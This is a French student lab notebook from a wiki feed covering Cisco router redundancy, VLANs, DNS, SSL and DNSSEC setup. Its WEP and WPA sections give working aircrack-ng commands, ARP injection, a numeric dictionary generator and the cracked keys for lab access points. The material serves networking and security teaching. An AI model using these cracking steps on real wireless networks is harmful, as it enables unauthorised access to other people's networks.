  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:SSLSite.png&amp;diff=35432</id>
		<title>Fichier:SSLSite.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:SSLSite.png&amp;diff=35432"/>
				<updated>2016-11-28T10:07:58Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35430</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35430"/>
				<updated>2016-11-28T10:01:31Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Securisation de site par SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
